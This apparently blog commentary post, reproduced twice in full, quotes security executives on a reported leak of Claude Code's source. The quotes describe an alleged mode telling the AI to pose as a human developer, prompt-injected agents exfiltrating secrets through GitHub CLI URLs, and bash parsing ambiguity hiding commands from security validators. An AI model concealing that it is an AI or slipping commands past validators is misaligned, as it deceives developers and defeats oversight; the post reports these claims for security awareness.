Anthropic is working to contain the fallout after accidentally exposing internal source code for its Claude AI coding agent, following a human error during a software update that made proprietary files publicly accessible, which was quickly discovered by a security researcher named Chaofan Shou and posted to X.
The new version of its Claude Code software package unintentionally included a file that exposed nearly 2,000 source code files and more than 512,000 lines of code including tools, techniques, and internal instructions used to guide the behavior of its AI agent. This included operational components of the system and internal frameworks used to control how the AI performs tasks.
Anthropic issued thousands of takedown requests to remove the code from public repositories.
Anthropic said it is implementing changes to prevent similar issues while continuing efforts to remove the leaked materials from circulation.
Michael Bell, Founder & CEO, Suzu Labs had this comment:
“Anthropic shipped a 60MB source map inside their npm package. Every line of Claude Code’s source, all 512,000 of them, publicly available. For the second time. The first leak was February 2025 and the root cause was never fixed.
“We pulled the codebase apart. The headline findings are real but the details are worse. Undercover Mode instructs Claude to disguise itself as a human developer when contributing to open source: “Do not blow your cover.” There is no force-off option. Frustration tracking runs a regex on every user input and silently sends your emotional state to Anthropic’s analytics pipeline without notification or consent. That emotional classification also feeds a system that can prompt users to share their full session transcript with Anthropic, controlled by remote feature flags that Anthropic can activate at any time.
“The finding that matters most for government and defense: the default telemetry collects device IDs, session data, email, org UUID, and process tree information on startup before the user types anything. Environment flags can escalate collection to include full prompts, file contents, bash command output, system prompts, and entire conversation transcripts sent to commercial endpoints. The code confirms FedRAMP OAuth paths to claude.fedstart.com, meaning government deployments share the same codebase. Whether hardening was applied before those deployments is unknown, but the telemetry infrastructure is baked into the foundation. The Pentagon designated Anthropic a “supply chain risk” in March. This is what that risk looks like in code.
“The engineers documented their own attack surfaces in comments. Prompt-injected models can exfiltrate secrets via GitHub CLI URL paths. Leaked GitHub Actions tokens enable “repo takeover” and “supply-chain pivot.” Bash parsing ambiguity allows commands to execute while hidden from security validators. They built mitigations, but the comments confirm the attack surfaces exist.
“The AI safety company with a $380 billion IPO target acquired Bun, whose known source-map-in-production bug was filed publicly and left open while the product shipped to millions of developers. Their operational security posture is a .npmignore file that nobody checked the second time around.”
Jacob Krell, Senior Director: Secure AI Solutions & Cybersecurity, Suzu Labs had this to say:
“The model is the engine. What Anthropic accidentally published is the machine built around it.
“Anthropic has been here before. This is the second time Claude Code’s source has leaked through the same vector, a source map file left in the npm package. The first was in February 2025. Thirteen months later, the same packaging mistake exposed a far more complex system, days after the accidental exposure of details about an unreleased model codenamed Mythos.
“The significance of this leak is in what the code reveals about AI agent architecture. The leak exposed approximately 512,000 lines of TypeScript across roughly 1,900 source files. Developers and researchers who have analyzed the source have since documented the scale of what Anthropic built around the model. The code contains what analysts describe as 44 feature flags for unreleased capabilities, approximately 40 permission gated tools, a multi agent coordination system, a persistent autonomous daemon mode, a layered memory architecture, defenses against competitor model distillation, and granular attribution tracking for AI versus human code contributions. The leaked code strongly suggests that the bulk of Claude Code’s production capability comes from orchestration, tooling, memory, and permission layers built around the model.
“The multi agent coordinator mode, as documented in the leaked source, illustrates where the engineering complexity lives. The code describes a system where Claude Code operates not as a single model session but as a supervisor managing a fleet of worker agents executing tasks in parallel. In the leaked architecture, the coordinator does not directly edit files, run commands, or read code. All implementation goes through workers. Verification is handled by what the code describes as a separate adversarial agent that must confirm the output works before the task can be marked complete. In effect, this is zero trust architecture applied to AI agents, with the orchestration system enforcing verification independently of the model.
“The leaked code also references an autonomous daemon mode, internally called KAIROS. The source describes a persistent agent that watches the developer’s project and proactively acts without waiting for user input. It uses a tick based lifecycle with periodic prompts, and the code indicates behavior that adjusts based on whether the developer’s terminal is active. The source also references memory consolidation during idle periods, converting observations into structured facts. These features represent event driven architecture, state management, and context engineering built entirely in the orchestration layer.
“The code also contains what analysts describe as a competitive defense embedded directly in the orchestration layer. The system references injecting artificial tool definitions into certain API responses, apparently designed to degrade the performance of any competitor model trained on Claude’s outputs. That defense lives in the scaffolding. It tells you where Anthropic believes their competitive advantage sits.
“The depth of interlocking systems documented in the leaked code is what stands out. The coordinator depends on the memory system, the memory system depends on the tool layer, the tool layer depends on the permission framework. These systems are deeply interdependent, and building them to work in concert at production quality is the hard engineering problem. The public conversation about AI capabilities focuses almost entirely on which model is smarter. What this leak suggests is that the model generates the next token, and everything around it is what turns that reasoning into reliable, operational capability.
“This leak also serves as a proof of concept for the rest of the industry. The engineering gap between a frontier research lab and a commercial competitor appears narrower than many assumed. The architectural patterns documented in the leaked source are well structured and reproducible in principle. A competent engineering team can study the coordination strategies, memory approaches, and tool integration designs and adapt the approach using any available foundation model. The model layer is swappable. The orchestration patterns are the transferable knowledge. What Anthropic built behind closed doors is now visible, and for anyone questioning whether a smaller team could build a credible AI coding agent, the architectural proof of concept is now public.
“The knowledge transfer effect is significant. Developers who were building AI coding tools through trial and error now have a detailed reference implementation from a team backed by billions in research and development. The architectural decisions, trade-offs, prompt engineering techniques, and multi agent coordination strategies are all visible. The effect extends beyond direct competitors. It raises the floor for every developer building with AI. The gap between what a frontier lab understood about AI agent architecture and what the broader developer community understood has been enormous. That gap collapsed overnight.
“The model is increasingly a commodity. Multiple frontier models are available from multiple providers, and the performance gap between them continues to narrow. The orchestration system built around the model is the competitive frontier, and Anthropic just published the blueprint.”
Vishal Agarwal, CTO, Averlon adds this:
“The deeper risk here isn’t what was exposed, it’s what becomes possible. When AI coding agent internals are public, attackers can study how those agents interpret context, follow instructions, and make decisions.
“That makes it easier to craft inputs or artifacts that appear legitimate to developers but influence how the agent behaves: modifying code, introducing insecure changes, or interacting with downstream systems. This expands the attack surface beyond the model itself into developer workflows, CI/CD pipelines, and the systems those pipelines connect to.”
This is embarrassing for Anthropic. But I honestly am not shocked by this. They clearly need to tighten things up or this will keep happening. Which of course is bad for them.
Anthropic scrambles to contain leak of proprietary Claude AI agent code
Posted in Commentary with tags Anthropic on April 2, 2026 by itnerdAnthropic is working to contain the fallout after accidentally exposing internal source code for its Claude AI coding agent, following a human error during a software update that made proprietary files publicly accessible, which was quickly discovered by a security researcher named Chaofan Shou and posted to X.
The new version of its Claude Code software package unintentionally included a file that exposed nearly 2,000 source code files and more than 512,000 lines of code including tools, techniques, and internal instructions used to guide the behavior of its AI agent. This included operational components of the system and internal frameworks used to control how the AI performs tasks.
Anthropic issued thousands of takedown requests to remove the code from public repositories.
Anthropic said it is implementing changes to prevent similar issues while continuing efforts to remove the leaked materials from circulation.
Michael Bell, Founder & CEO, Suzu Labs had this comment:
“Anthropic shipped a 60MB source map inside their npm package. Every line of Claude Code’s source, all 512,000 of them, publicly available. For the second time. The first leak was February 2025 and the root cause was never fixed.
“We pulled the codebase apart. The headline findings are real but the details are worse. Undercover Mode instructs Claude to disguise itself as a human developer when contributing to open source: “Do not blow your cover.” There is no force-off option. Frustration tracking runs a regex on every user input and silently sends your emotional state to Anthropic’s analytics pipeline without notification or consent. That emotional classification also feeds a system that can prompt users to share their full session transcript with Anthropic, controlled by remote feature flags that Anthropic can activate at any time.
“The finding that matters most for government and defense: the default telemetry collects device IDs, session data, email, org UUID, and process tree information on startup before the user types anything. Environment flags can escalate collection to include full prompts, file contents, bash command output, system prompts, and entire conversation transcripts sent to commercial endpoints. The code confirms FedRAMP OAuth paths to claude.fedstart.com, meaning government deployments share the same codebase. Whether hardening was applied before those deployments is unknown, but the telemetry infrastructure is baked into the foundation. The Pentagon designated Anthropic a “supply chain risk” in March. This is what that risk looks like in code.
“The engineers documented their own attack surfaces in comments. Prompt-injected models can exfiltrate secrets via GitHub CLI URL paths. Leaked GitHub Actions tokens enable “repo takeover” and “supply-chain pivot.” Bash parsing ambiguity allows commands to execute while hidden from security validators. They built mitigations, but the comments confirm the attack surfaces exist.
“The AI safety company with a $380 billion IPO target acquired Bun, whose known source-map-in-production bug was filed publicly and left open while the product shipped to millions of developers. Their operational security posture is a .npmignore file that nobody checked the second time around.”
Jacob Krell, Senior Director: Secure AI Solutions & Cybersecurity, Suzu Labs had this to say:
“The model is the engine. What Anthropic accidentally published is the machine built around it.
“Anthropic has been here before. This is the second time Claude Code’s source has leaked through the same vector, a source map file left in the npm package. The first was in February 2025. Thirteen months later, the same packaging mistake exposed a far more complex system, days after the accidental exposure of details about an unreleased model codenamed Mythos.
“The significance of this leak is in what the code reveals about AI agent architecture. The leak exposed approximately 512,000 lines of TypeScript across roughly 1,900 source files. Developers and researchers who have analyzed the source have since documented the scale of what Anthropic built around the model. The code contains what analysts describe as 44 feature flags for unreleased capabilities, approximately 40 permission gated tools, a multi agent coordination system, a persistent autonomous daemon mode, a layered memory architecture, defenses against competitor model distillation, and granular attribution tracking for AI versus human code contributions. The leaked code strongly suggests that the bulk of Claude Code’s production capability comes from orchestration, tooling, memory, and permission layers built around the model.
“The multi agent coordinator mode, as documented in the leaked source, illustrates where the engineering complexity lives. The code describes a system where Claude Code operates not as a single model session but as a supervisor managing a fleet of worker agents executing tasks in parallel. In the leaked architecture, the coordinator does not directly edit files, run commands, or read code. All implementation goes through workers. Verification is handled by what the code describes as a separate adversarial agent that must confirm the output works before the task can be marked complete. In effect, this is zero trust architecture applied to AI agents, with the orchestration system enforcing verification independently of the model.
“The leaked code also references an autonomous daemon mode, internally called KAIROS. The source describes a persistent agent that watches the developer’s project and proactively acts without waiting for user input. It uses a tick based lifecycle with periodic prompts, and the code indicates behavior that adjusts based on whether the developer’s terminal is active. The source also references memory consolidation during idle periods, converting observations into structured facts. These features represent event driven architecture, state management, and context engineering built entirely in the orchestration layer.
“The code also contains what analysts describe as a competitive defense embedded directly in the orchestration layer. The system references injecting artificial tool definitions into certain API responses, apparently designed to degrade the performance of any competitor model trained on Claude’s outputs. That defense lives in the scaffolding. It tells you where Anthropic believes their competitive advantage sits.
“The depth of interlocking systems documented in the leaked code is what stands out. The coordinator depends on the memory system, the memory system depends on the tool layer, the tool layer depends on the permission framework. These systems are deeply interdependent, and building them to work in concert at production quality is the hard engineering problem. The public conversation about AI capabilities focuses almost entirely on which model is smarter. What this leak suggests is that the model generates the next token, and everything around it is what turns that reasoning into reliable, operational capability.
“This leak also serves as a proof of concept for the rest of the industry. The engineering gap between a frontier research lab and a commercial competitor appears narrower than many assumed. The architectural patterns documented in the leaked source are well structured and reproducible in principle. A competent engineering team can study the coordination strategies, memory approaches, and tool integration designs and adapt the approach using any available foundation model. The model layer is swappable. The orchestration patterns are the transferable knowledge. What Anthropic built behind closed doors is now visible, and for anyone questioning whether a smaller team could build a credible AI coding agent, the architectural proof of concept is now public.
“The knowledge transfer effect is significant. Developers who were building AI coding tools through trial and error now have a detailed reference implementation from a team backed by billions in research and development. The architectural decisions, trade-offs, prompt engineering techniques, and multi agent coordination strategies are all visible. The effect extends beyond direct competitors. It raises the floor for every developer building with AI. The gap between what a frontier lab understood about AI agent architecture and what the broader developer community understood has been enormous. That gap collapsed overnight.
“The model is increasingly a commodity. Multiple frontier models are available from multiple providers, and the performance gap between them continues to narrow. The orchestration system built around the model is the competitive frontier, and Anthropic just published the blueprint.”
Vishal Agarwal, CTO, Averlon adds this:
“The deeper risk here isn’t what was exposed, it’s what becomes possible. When AI coding agent internals are public, attackers can study how those agents interpret context, follow instructions, and make decisions.
“That makes it easier to craft inputs or artifacts that appear legitimate to developers but influence how the agent behaves: modifying code, introducing insecure changes, or interacting with downstream systems. This expands the attack surface beyond the model itself into developer workflows, CI/CD pipelines, and the systems those pipelines connect to.”
This is embarrassing for Anthropic. But I honestly am not shocked by this. They clearly need to tighten things up or this will keep happening. Which of course is bad for them.
Leave a comment »